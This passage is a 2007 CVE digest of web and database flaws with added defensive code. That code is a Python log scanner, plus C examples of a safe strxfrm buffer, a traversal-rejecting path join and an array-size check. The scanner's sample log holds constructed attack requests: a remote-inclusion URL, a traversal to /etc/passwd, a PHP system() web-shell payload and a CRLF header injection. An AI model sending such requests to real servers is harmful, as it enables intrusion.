** DISPUTED ** PHP remote file inclusion vulnerability in index.php in Ivan Gallery Script 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the dir parameter.

7.5
2007-04-18 CVE-2007-2070 Turnkey WEB Tools Code Injection vulnerability in Turnkey web Tools Sunshop Shopping Cart 3.5

Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart before 3.5.1 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) index.php or (2) checkout.php.

7.5
2007-04-18 CVE-2007-2069 Openmairie Applications 'dsn[phptype]' Parameter Local File Include vulnerability in openMairie

Directory traversal vulnerability in scr/soustab.php in openMairie 1.11 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) sequence.

7.5
2007-04-18 CVE-2007-2067 Webslider Remote Security vulnerability in Webslider 0.6

Multiple PHP remote file inclusion vulnerabilities in Marco Antonio Islas Cruz Web Slider (WebSlider) 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) index.php, (2) modules/pdf.php, (3) plugins/highlight.php, or (4) include/modules.php.

7.5
2007-04-18 CVE-2007-2065 Actionpoll Remote File Include vulnerability in Actionpoll 1.1.1

PHP remote file inclusion vulnerability in db/PollDB.php in Robert Ladstaetter ActionPoll 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG_DATAREADERWRITER parameter, a different vector than CVE-2001-1297.

7.5
2007-04-18 CVE-2007-2064 Actionpoll Remote File Include vulnerability in Actionpoll 1.1.0/1.1.1

Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP code via a URL in (1) the CONFIG_POLLDB parameter to actionpoll.php or (2) the CONFIG_DB parameter to db/DataReaderWriter.php, different vectors than CVE-2001-1297.

7.5
2007-04-16 CVE-2007-2047 Openads Remote Security vulnerability in Openads 2.3.30

CRLF injection vulnerability in www/delivery/ck.php in Openads 2.3 (aka Max Media Manager, MMM) before 0.3.31-alpha-pr3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the destination parameter.

7.5
2007-04-16 CVE-2007-2046 Openads Remote Security vulnerability in Openads

Multiple CRLF injection vulnerabilities in adclick.php in (a) Openads (phpAdsNew) 2.0.11 and earlier and (b) Openads for PostgreSQL (phpPgAds) 2.0.11 and earlier allow remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in (1) the dest parameter and (2) the Referer HTTP header.

7.5
2007-04-16 CVE-2007-2044 Antonis Ventouris Remote Security vulnerability in Weather Module

PHP remote file inclusion vulnerability in mod_weather.php in the Antonis Ventouris Weather module for Mambo and Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter.

7.5
2007-04-16 CVE-2007-2043 Avant Garde Solutions Remote File Include vulnerability in Mambo/Joomla Com_Mosmedia MosConfig_Absolute_Path

Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia (com_mosmedia) 1.08 and earlier module for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) media.tab.php or (2) media.divs.php.

7.5
2007-04-16 CVE-2007-2032 Cisco Multiple vulnerability in Cisco Wireless Control System 4.0/4.0.95

Cisco Wireless Control System (WCS) before 4.0.96.0 has a hard-coded FTP username and password for backup operations, which allows remote attackers to read and modify arbitrary files via unspecified vectors related to "properties of the FTP server," aka Bug ID CSCse93014.

7.5
2007-04-16 CVE-2007-1997 Clam Anti Virus Remote vulnerability in ClamAV

Integer signedness error in the (1) cab_unstore and (2) cab_extract functions in libclamav/cab.c in Clam AntiVirus (ClamAV) before 0.90.2 allow remote attackers to execute arbitrary code via a crafted CHM file that contains a negative integer, which passes a signed comparison and leads to a stack-based buffer overflow.

7.5
2007-04-18 CVE-2007-2134 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the HTML Server in Oracle JD Edwards EnterpriseOne SP23_Q1 and 8.96.I1 has unknown impact and local attack vectors, aka JDE01.

7.2
2007-04-16 CVE-2007-1745 Clam Anti Virus, Ifenslave Remote vulnerability in ClamAV

The chm_decompress_stream function in libclamav/chmunpack.c in Clam AntiVirus (ClamAV) before 0.90.2 leaks file descriptors, which has unknown impact and attack vectors involving a crafted CHM file, a different vulnerability than CVE-2007-0897.

7.1
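
Most of the High entries above reduce to four input patterns that all show up in the query string: a URL in a parameter that ends up in include() (the PHP remote file inclusion entries, for example CVE-2007-2158 and CVE-2007-2156), a .. sequence that reaches a local include (CVE-2007-2104, CVE-2007-2105, CVE-2007-2106, CVE-2007-2069), a literal <?php tag written into a file (the static code injection entries, for example CVE-2007-2141 and CVE-2007-2167), and a CRLF in a redirect destination (CVE-2007-2046, CVE-2007-2047). Because they live in the request line, an ordinary web-server access log is enough to hunt for attempts. The scanner below is an added example, not code from any of these projects: it parses Apache combined-format lines, percent-decodes every parameter a second time to catch double encoding, and tags each request with the patterns it matches. The lines in SAMPLE_LOG are constructed for this example; the client addresses are documentation ranges, and the paths and parameter names are taken from the entries above.

```python
"""Tag web requests carrying the query-string attack patterns that dominate this
week's High list: remote file inclusion, directory traversal, PHP static code
injection and CRLF/response splitting.  Added example; the log is constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format lines; paths and parameter names mirror the report.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Apr/2007:10:01:02 +0000] "GET /jgallery/index.php?G_JGALL[inc_path]=http://203.0.113.9/x.txt? HTTP/1.0" 200 512 "-" "-"
203.0.113.5 - - [19/Apr/2007:10:01:05 +0000] "GET /zomplog/upload/force_download.php?file=../../../../etc/passwd HTTP/1.0" 200 1024 "-" "-"
203.0.113.5 - - [19/Apr/2007:10:01:09 +0000] "GET /shoutpro/shoutbox.php?shout=%3C%3Fphp%20system%28%24_GET%5Bc%5D%29%3B%20%3F%3E HTTP/1.0" 200 88 "-" "-"
203.0.113.5 - - [16/Apr/2007:10:01:12 +0000] "GET /openads/www/delivery/ck.php?destination=http://example.com/%0d%0aSet-Cookie:%20x=1 HTTP/1.0" 302 0 "-" "-"
198.51.100.7 - - [18/Apr/2007:10:02:00 +0000] "GET /gallery/index.php?gallery=summer2007 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# A value that PHP's include()/require() would fetch remotely (http, ftp, php:// and data: wrappers).
RFI_RE = re.compile(r"^\s*(?:(?:https?|ftps?|php)://|data:)", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\)")
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)   # <?php, <?= or a short "<? " tag
CRLF_RE = re.compile(r"[\r\n]")


def classify_value(value):
    """Return the set of attack tags matching one already-decoded parameter value."""
    decoded = unquote(value)          # second decode: catches %252e%252e%252f and friends
    tags = set()
    if RFI_RE.search(decoded):
        tags.add("rfi")
    if TRAVERSAL_RE.search(decoded):
        tags.add("traversal")
    if PHP_TAG_RE.search(decoded):
        tags.add("php-injection")
    if CRLF_RE.search(decoded):
        tags.add("crlf")
    return tags


def classify_request(target):
    """Classify a request target (path plus query); returns (path, tags)."""
    parts = urlsplit(target)
    tags = set()
    if TRAVERSAL_RE.search(unquote(parts.path)):     # traversal can sit in the path itself
        tags.add("traversal")
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        tags |= classify_value(value)                 # parse_qsl already decoded once
    return parts.path, tags


def scan_log(text):
    """One finding per suspicious request: (client ip, path, sorted tag list)."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                  # not combined format, skip it
        path, tags = classify_request(m.group("target"))
        if tags:
            findings.append((m.group("ip"), path, sorted(tags)))
    return findings


if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {','.join(tags)}")
```

A redirect parameter such as Openads' destination legitimately carries a URL, so the "rfi" tag on its own is a weak signal for that line; the "crlf" tag is the one that matters there. Traversal in the path component is normalised away by most servers before the application sees it, which is why the query-string check does the real work and the path check is only a second net.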

59 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-18 CVE-2007-2083 Zonelabs Unspecified vulnerability in Zonelabs Zonealarm

vsdatant.sys in Check Point Zone Labs ZoneAlarm Pro before 7.0.302.000 does not validate certain arguments before being passed to hooked SSDT function handlers, which allows local users to cause a denial of service (system crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateKey and (2) NtDeleteFile functions.

6.9
2007-04-18 CVE-2007-2075 Scramdisk 4 Linux Local Privilege Escalation vulnerability in ScramDisk 4 Linux

ScramDisk 4 Linux before 1.0-1 does not perform permission checks on mount points, which allows local users to gain privileges by using a system directory as a mount point for a container.

6.9
2007-04-22 CVE-2007-2166 Opensurveypilot Remote File Include vulnerability in OpenSurveyPilot Group.Inc.PHP

PHP remote file inclusion vulnerability in administration/user/lib/group.inc.php in OpenSurveyPilot (osp) 1.2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cfgPathToProjectAdmin parameter.

6.8
2007-04-19 CVE-2007-2153 Atmail Cross-Site Scripting vulnerability in @Mail Atmail.PHP

Cross-site scripting (XSS) vulnerability in atmail.php in @Mail 5.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter.

6.8
2007-04-19 CVE-2007-2144 Joomlapack Code Injection vulnerability in Joomlapack 1.0.4A2Re

PHP remote file inclusion vulnerability in includes/CAltInstaller.php in the JoomlaPack (com_jpack) 1.0.4a2 RE component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

6.8
2007-04-19 CVE-2007-1691 Second Sight Software ActiveX Controls Multiple Buffer Overflow vulnerability in Second Sight Software

Stack-based buffer overflow in Second Sight Software ActiveMod ActiveX control (ActiveMod.ocx) allows remote attackers to execute arbitrary code via unspecified vectors.

6.8
2007-04-19 CVE-2007-1690 Second Sight Software ActiveX Controls Multiple Buffer Overflow vulnerability in Second Sight Software

Multiple stack-based buffer overflows in Second Sight Software ActiveGS ActiveX control (ActiveGS.ocx) allow remote attackers to execute arbitrary code via unspecified vectors.

6.8
2007-04-18 CVE-2007-2119 Oracle Multiple vulnerabilities in Oracle Application Server and Database Server

Cross-site scripting (XSS) vulnerability in boundary_rules.jsp in the Administration Front End for Oracle Enterprise (Ultra) Search, as used in Database Server 9.2.0.8, 10.1.0.5, and 10.2.0.2, and in Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to inject arbitrary HTML or web script via the EXPTYPE parameter, aka SES01.

6.8
2007-04-18 CVE-2007-2117 Oracle Multiple vulnerabilities in Oracle Database Server 9.2.0.5

Unspecified vulnerability in the Oracle Text component in Oracle Database 9.0.1.5+ and 9.2.0.5 has unknown impact and attack vectors, aka DB12.

6.8
2007-04-18 CVE-2007-2115 Oracle Multiple vulnerabilities in Oracle Database Server 10.1.0.5/10.2.0.2/9.2.0.7

Unspecified vulnerability in the Change Data Capture (CDC) component in Oracle Database 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors, aka DB09.

6.8
2007-04-18 CVE-2007-2108 Microsoft, Oracle Permissions, Privileges, and Access Controls vulnerability in multiple products

Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01.

6.8
2007-04-18 CVE-2007-2102 MY Little Homepage Cross-Site Scripting vulnerability in My Little Weblog

Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vector than CVE-2006-6087.

6.8
2007-04-18 CVE-2007-2099 Openconcept Cross-Site Scripting vulnerability in Openconcept Back-End CMS 0.4.7

Cross-site scripting (XSS) vulnerability in htdocs/php.php in OpenConcept Back-End CMS 0.4.7 allows remote attackers to inject arbitrary web script or HTML via the page[] parameter.

6.8
2007-04-18 CVE-2007-2098 Wabbit Cross-Site Scripting vulnerability in Wabbit PHP Gallery 0.9

Multiple cross-site scripting (XSS) vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) pic and (2) gal parameters.

6.8
2007-04-18 CVE-2007-2090 Tumusika Evolution Cross-Site Scripting vulnerability in Tumusika Evolution 1.6

Cross-site scripting (XSS) vulnerability in index.php in TuMusika Evolution 1.6 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.

6.8
2007-04-18 CVE-2007-2089 JX Development Remote File Include vulnerability in Mambo/Joomla New Article Component Absolute_Path

Multiple PHP remote file inclusion vulnerabilities in the Jx Development Article 1.1 and earlier component for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to com_articles.php in (1) components/ or (2) classes/html/.

6.8
2007-04-18 CVE-2007-2087 Cnstats Remote Security vulnerability in Cnstats 2.12

Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/.

6.8
2007-04-18 CVE-2007-2086 Cnstats Remote File Include vulnerability in Cnstats 2.9

Multiple PHP remote file inclusion vulnerabilities in CNStats 2.9 allow remote attackers to execute arbitrary PHP code via a URL in the bj parameter to (1) who_r.php or (2) who_s.php in reports/.

6.8
2007-04-18 CVE-2007-2085 Oe2Edit Cross-Site Scripting vulnerability in OE2edit OE2edit.CGI

Cross-site scripting (XSS) vulnerability in oe2edit.cgi in oe2edit CMS allows remote attackers to inject arbitrary web script or HTML via the q parameter.

6.8
2007-04-18 CVE-2007-2084 Mobilepublisherphp Code Injection vulnerability in Mobilepublisherphp 1.1.2

** DISPUTED ** PHP remote file inclusion vulnerability in MobilePublisherphp 1.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the auth_method parameter to (1) index.php, (2) list.php, (3) postreview.php, (4) reindex.php, (5) sections.php, (6) templates.php, (7) userinfo.php, (8) users.php, and (9) view.php in admin/.

6.8
2007-04-18 CVE-2006-7194 Republique Francaise Remote Security vulnerability in Republique Francaise Agora 1.4Rc1

PHP remote file inclusion vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php in Agora 1.4 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _SESSION[PATH_COMPOSANT] parameter.

6.8
2007-04-18 CVE-2007-2078 Maian Unspecified vulnerability in Maian Weblog 3.1

** DISPUTED ** PHP remote file inclusion vulnerability in index.php in Maian Weblog 3.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

6.8
2007-04-18 CVE-2007-2076 Maian Remote Security vulnerability in Maian Gallery 1.0

PHP remote file inclusion vulnerability in index.php in Maian Gallery 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

6.8
2007-04-18 CVE-2007-2068 Storefront FOR Gallery Remote File Include vulnerability in StoreFront for Gallery Gallery_BaseDir

Multiple PHP remote file inclusion vulnerabilities in the StoreFront mods for Gallery allow remote attackers to execute arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter to (1) mods/business_functions.php or (2) mods/ui_functions.php.

6.8
2007-04-18 CVE-2007-2060 Wizz Computers Unspecified vulnerability in Wizz Computers Wizz RSS Reader

Cross-zone scripting vulnerability in the Wizz RSS Reader before 2.1.9 extension to Mozilla Firefox allows remote attackers to execute arbitrary JavaScript in the browser chrome via the RSS feed DOM.

6.8
2007-04-18 CVE-2007-2058 Picozip Directory Traversal vulnerability in Picozip 4.02

Directory traversal vulnerability in Acubix PicoZip 4.02 allows user-assisted remote attackers to overwrite arbitrary files via a ..

6.8
2007-04-16 CVE-2007-2049 Mambo Remote File Include vulnerability in Mambo Calendar 1.5.5

Multiple PHP remote file inclusion vulnerabilities in the Calendar Module (com_calendar) 1.5.5 for Mambo allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) com_calendar.php or (2) mod_calendar.php.

6.8
2007-04-16 CVE-2007-2042 Avant Garde Solutions Remote Security vulnerability in Avant-Garde Solutions Mosmedia 1.0.6

Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite 1.0.6 and earlier module for Mambo allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) support.html.php or (2) info.html.php.

6.8
2007-04-19 CVE-2007-2148 Stephen Craton Remote Security vulnerability in Chatness

Direct static code injection vulnerability in admin/save.php in Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier allows remote authenticated administrators to inject PHP code into .html files via the html parameter, as demonstrated by head.html and foot.html, which are included and executed upon a direct request for index.php.

6.5
2007-04-18 CVE-2007-2111 Oracle SQL Injection vulnerability in Oracle Database Server 10.1.0.5/9.0.1.5/9.2.0.7

SQL injection vulnerability in the SYS.DBMS_AQADM_SYS package in Oracle Database 9.0.1.5, 9.2.0.7, and 10.1.0.5 allows remote authenticated users to inject arbitrary SQL commands via unknown vectors, aka DB04.

6.5
2007-04-18 CVE-2007-2082 Myblog Remote Security vulnerability in MyBlog

Direct static code injection vulnerability in admin/settings.php in MyBlog 0.9.8 and earlier allows remote authenticated admin users to inject arbitrary PHP code via the content parameter, which can be executed by accessing index.php.

6.5
2007-04-16 CVE-2007-2033 Cisco Multiple vulnerabilities in Cisco Wireless Control System

Unspecified vulnerability in Cisco Wireless Control System (WCS) before 4.0.81.0 allows remote authenticated users to read any configuration page by changing the group membership of user accounts, aka Bug ID CSCse78596.

6.5
2007-04-16 CVE-2007-2040 Cisco Remote vulnerability in Cisco Wireless LAN Controller

Cisco Aironet 1000 Series and 1500 Series Lightweight Access Points before 3.2.185.0, and 4.0.x before 4.0.206.0, have a hard-coded password, which allows attackers with physical access to perform arbitrary actions on the device, aka Bug ID CSCsg15192.

6.2
2007-04-16 CVE-2007-2039 Cisco Resource Management Errors vulnerability in Cisco Wireless LAN Controller Software

The Network Processing Unit (NPU) in the Cisco Wireless LAN Controller (WLC) before 3.2.171.5, 4.0.x before 4.0.206.0, and 4.1.x allows remote attackers on a local wireless network to cause a denial of service (loss of packet forwarding) via (1) crafted SNAP packets, (2) malformed 802.11 traffic, or (3) packets with certain header length values, aka Bug IDs CSCsg15901 and CSCsh10841.

6.1
2007-04-16 CVE-2007-2038 Cisco Remote vulnerability in Cisco Wireless LAN Controller

The Network Processing Unit (NPU) in the Cisco Wireless LAN Controller (WLC) before 3.2.193.5, 4.0.x before 4.0.206.0, and 4.1.x allows remote attackers on a local wireless network to cause a denial of service (loss of packet forwarding) via (1) crafted SNAP packets, (2) malformed 802.11 traffic, or (3) packets with certain header length values, aka Bug ID CSCsg36361.

6.1
2007-04-18 CVE-2007-2112 Oracle Multiple vulnerabilities in Oracle Database Server 10.1.0.5/10.2.0.3

Unspecified vulnerability in the Authentication component for Oracle Database 10.1.0.5 and 10.2.0.3 has unknown impact and attack vectors, aka DB05.

6.0
2007-04-18 CVE-2007-2109 Oracle Multiple vulnerabilities in Oracle Database Server 10.2.0.3

Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 have unknown impact and remote authenticated attack vectors related to (1) Rules Manager and Expression Filter components (DB02) and (2) Oracle Streams (DB06).

6.0
2007-04-22 CVE-2007-2165 Proftpd Project Authentication Module Security Bypass vulnerability in ProFTPD AUTH

The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.

5.1
2007-04-22 CVE-2007-2164 KDE Denial-Of-Service vulnerability in KDE Konqueror 3.5.5

Konqueror 3.5.5 release 45.4 allows remote attackers to cause a denial of service (browser crash or abort) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

5.0
2007-04-22 CVE-2007-2163 Apple Denial-Of-Service vulnerability in Safari

Apple Safari allows remote attackers to cause a denial of service (browser crash) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

5.0
2007-04-19 CVE-2007-2151 Mcafee Denial of Service vulnerability in McAfee E-Business Administration Server Authentication Packet

The administration server in McAfee e-Business Server before 8.1.1 and 8.5.x before 8.5.2 allows remote attackers to cause a denial of service (service crash) via a large length value in a malformed authentication packet, which triggers a heap over-read.

5.0
2007-04-18 CVE-2007-2066 Usebb Information Disclosure vulnerability in UseBB

UseBB before 1.0.6 allows remote attackers to obtain sensitive information via a request with unspecified GET or POST parameters to an unspecified script, which reveals the path in an error message.

5.0
2007-04-18 CVE-2007-1869 Lighttpd Remote Denial of Service vulnerability in Lighttpd 1.4.12/1.4.13

lighttpd 1.4.12 and 1.4.13 allows remote attackers to cause a denial of service (cpu and resource consumption) by disconnecting while lighttpd is parsing CRLF sequences, which triggers an infinite loop and file descriptor consumption.

5.0
2007-04-16 CVE-2007-2052 Python Software Foundation Numeric Errors vulnerability in Python Software Foundation Python 2.4/2.5

Off-by-one error in the PyLocale_strxfrm function in Modules/_localemodule.c for Python 2.4 and 2.5 causes an incorrect buffer size to be used for the strxfrm function, which allows context-dependent attackers to read portions of memory via unknown manipulations that trigger a buffer over-read due to missing null termination.

5.0
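The Python entry above (CVE-2007-2052) describes a sizing mistake that is easy to repeat with strxfrm, because the function reports the transformed length without the terminating NUL. The following C code is an added example written for this report, not CPython's _localemodule.c: it shows the undersized allocation beside the corrected one and a check that tells the caller whether the result was actually terminated. Function names (xfrm_needed, xfrm_into, xfrm_dup) and the sample input are the example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* strxfrm(NULL, s, 0) reports the transformed length EXCLUDING the
 * terminating NUL, so a buffer for the result needs that value plus one. */
size_t xfrm_needed(const char *s)
{
    return strxfrm(NULL, s, 0) + 1;
}

/* Transform s into buf (bufsize bytes). Returns 1 when the result fit and
 * is NUL-terminated. Returns 0 when strxfrm reported a length >= bufsize:
 * the buffer contents are then indeterminate and no terminator is
 * guaranteed, so the caller must not read buf as a C string. */
int xfrm_into(char *buf, size_t bufsize, const char *s)
{
    size_t n = strxfrm(buf, s, bufsize);
    return n < bufsize;
}

/* The off-by-one pattern: the buffer is exactly the reported length, with
 * no room for the NUL. Returns xfrm_into's verdict (0 for any non-empty s).
 * The unterminated buffer is never read here, only sized and freed. */
int demo_undersized(const char *s)
{
    size_t len = strxfrm(NULL, s, 0);   /* excludes the NUL */
    char *buf = malloc(len);            /* should be len + 1 */
    if (len && !buf) return -1;
    int ok = xfrm_into(buf, len, s);
    free(buf);
    return ok;
}

/* Corrected pattern: allocate the reported length plus one, then verify. */
char *xfrm_dup(const char *s)
{
    size_t need = xfrm_needed(s);
    char *buf = malloc(need);
    if (!buf) return NULL;
    if (!xfrm_into(buf, need, s)) {
        free(buf);
        return NULL;
    }
    return buf;
}

/* 1 if xfrm_dup(s) yields a terminated string whose length matches the
 * length strxfrm reported, 0 otherwise. */
int xfrm_dup_is_consistent(const char *s)
{
    char *t = xfrm_dup(s);
    if (!t) return 0;
    int ok = strlen(t) == xfrm_needed(s) - 1;
    free(t);
    return ok;
}

int main(void)
{
    const char *sample = "locale-sensitive";   /* constructed input */
    printf("needed=%zu undersized_ok=%d fixed_ok=%d\n",
           xfrm_needed(sample), demo_undersized(sample),
           xfrm_dup_is_consistent(sample));
    return 0;
}
```

In the default "C" locale the transform is an identity copy, which makes the length arithmetic easy to verify; in other locales the transformed length can differ from strlen(s), which is exactly why the code relies on the value strxfrm reports rather than the input length.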
2007-04-16 CVE-2007-2051 Bftpd Remote Security vulnerability in Bftpd 1.6/1.7

Buffer overflow in the parsecmd function in bftpd before 1.8 has unknown impact and attack vectors related to the confstr variable.

5.0
2007-04-16 CVE-2007-2050 Ricargbook Local File Include vulnerability in Ricargbook 1.2.1

Multiple directory traversal vulnerabilities in header.php in RicarGBooK 1.2.1 allow remote attackers to include and execute arbitrary local files via a ..

5.0
2007-04-16 CVE-2007-2048 Webmethods Directory Traversal vulnerability in webMethods Glue Console

Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system files via a ..

5.0
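Three entries above (PicoZip, CVE-2007-2058; RicarGBooK, CVE-2007-2050; webMethods Glue, CVE-2007-2048) are ".." traversal bugs where a name supplied by an attacker is joined to a base directory. The C below is an added example for this report, not code from any of those products: a component-by-component validator that refuses the name before any path is opened. EXTRACT_ROOT and the member names in main are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Build "<base>/<entry>" into out, refusing any entry that could escape
 * base. Returns 1 and fills out on success; returns 0 and leaves out empty
 * on rejection. Rejected: absolute paths, backslash separators, empty
 * components ("a//b"), trailing slashes, and "." or ".." components. */
int safe_join(const char *base, const char *entry, char *out, size_t outlen)
{
    if (outlen) out[0] = '\0';
    if (!base || !entry || !*entry || !outlen) return 0;
    if (entry[0] == '/' || strchr(entry, '\\')) return 0;

    for (const char *p = entry; ; ) {
        const char *slash = strchr(p, '/');
        size_t clen = slash ? (size_t)(slash - p) : strlen(p);
        if (clen == 0) return 0;                                /* "a//b" or "a/" */
        if (clen == 1 && p[0] == '.') return 0;                 /* "." */
        if (clen == 2 && p[0] == '.' && p[1] == '.') return 0;  /* ".." */
        if (!slash) break;
        p = slash + 1;
    }

    int n = snprintf(out, outlen, "%s/%s", base, entry);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}

/* Constructed extraction root for the example. */
#define EXTRACT_ROOT "/tmp/extract"

/* 1 if entry would be accepted for extraction under EXTRACT_ROOT. */
int join_accepts(const char *entry)
{
    char out[512];
    return safe_join(EXTRACT_ROOT, entry, out, sizeof out);
}

/* 1 if entry is accepted and resolves to exactly expected. */
int join_equals(const char *entry, const char *expected)
{
    char out[512];
    return safe_join(EXTRACT_ROOT, entry, out, sizeof out)
        && strcmp(out, expected) == 0;
}

int main(void)
{
    /* Constructed archive member names, including traversal attempts. */
    const char *names[] = { "docs/readme.txt", "../../etc/passwd",
                            "/etc/passwd", "a/../b", "..\\x", "a/./b" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-20s %s\n", names[i],
               join_accepts(names[i]) ? "accept" : "reject");
    return 0;
}
```

This validates the name, not the filesystem: an archive that first extracts a symlink and then writes through it still escapes the root, so an extractor should additionally refuse to follow symlinks (O_NOFOLLOW, or a realpath check of the parent directory) when it opens the target.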
2007-04-16 CVE-2007-2045 SUN Remote Denial of Service vulnerability in SUN Sunos 5.8/5.9

Unspecified vulnerability in the IP implementation in Sun Solaris 8 and 9 allows remote attackers to cause a denial of service (CPU consumption) via crafted IP packets, probably related to fragmented packets with duplicate or missing fragments.

5.0
2007-04-16 CVE-2007-2030 Redhat Unspecified vulnerability in Redhat Enterprise Linux and Fedora Core

lharc.c in lha does not securely create temporary files, which might allow local users to read or write files by creating a file before LHA is invoked.

4.9
2007-04-22 CVE-2007-2172 Linux, Debian, Canonical Improper Input Validation vulnerability in multiple products

A typo in Linux kernel 2.6 before 2.6.21-rc6 and 2.4 before 2.4.35 causes RTA_MAX to be used as an array size instead of RTN_MAX, which leads to an "out of bound access" by the (1) dn_fib_props (dn_fib.c, DECNet) and (2) fib_props (fib_semantics.c, IPv4) functions.

4.7
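The kernel entry above (CVE-2007-2172) is a table sized by one enumeration's maximum and indexed by another's. The C below is an added example for this report, not kernel code: the enumerations, struct and values are illustrative stand-ins for RTN_*/RTA_* and fib_props, and the point is the two defences a reviewer would ask for, a compile-time size check tied to the indexing enumeration and a lookup whose bound comes from the table itself rather than from a hand-picked constant.

```c
#include <stddef.h>
#include <stdio.h>

/* Two unrelated enumerations in the style of the kernel's RTN_* route
 * types and RTA_* route attributes (illustrative values, not the kernel's). */
enum route_type { RT_UNSPEC, RT_UNICAST, RT_LOCAL, RT_BROADCAST, RT_MULTICAST, __RT_MAX };
enum route_attr { RA_UNSPEC, RA_DST, RA_GATEWAY, __RA_MAX };
#define RT_MAX (__RT_MAX - 1)
#define RA_MAX (__RA_MAX - 1)

struct route_props { int error; unsigned scope; };

/* Per-type property table. The typo described in the advisory would read
 * props[RA_MAX + 1] here: three slots for five route types. */
static const struct route_props props[RT_MAX + 1] = {
    [RT_UNSPEC]    = { -1, 0 },
    [RT_UNICAST]   = {  0, 0 },
    [RT_LOCAL]     = {  0, 1 },
    [RT_BROADCAST] = {  0, 2 },
    [RT_MULTICAST] = {  0, 2 },
};

#define N_ELEMS(a) (sizeof(a) / sizeof((a)[0]))

/* Compile-time guard: one slot per route_type value. With the mistyped
 * size this line stops the build instead of shipping an out-of-bounds read. */
_Static_assert(N_ELEMS(props) == (size_t)__RT_MAX,
               "route_props must cover every route_type");

/* Look up properties for a type value that came from untrusted input
 * (a netlink message, say). The bound is taken from the table itself. */
const struct route_props *lookup_props(unsigned type)
{
    if (type >= N_ELEMS(props)) return NULL;
    return &props[type];
}

/* Scope for a type, or -1 when the type is out of range. */
int props_scope(unsigned type)
{
    const struct route_props *p = lookup_props(type);
    return p ? (int)p->scope : -1;
}

/* Shows the drift: 1 if sizing the table by the attribute enumeration would
 * make it shorter than the number of route types it is indexed by. */
int mistyped_size_is_short(void)
{
    return (RA_MAX + 1) < (RT_MAX + 1);
}

int main(void)
{
    /* Constructed inputs: one valid type, one just past the end, one absurd. */
    unsigned samples[] = { RT_LOCAL, RT_MAX + 1, 200 };
    for (size_t i = 0; i < N_ELEMS(samples); i++)
        printf("type %3u -> scope %d\n", samples[i], props_scope(samples[i]));
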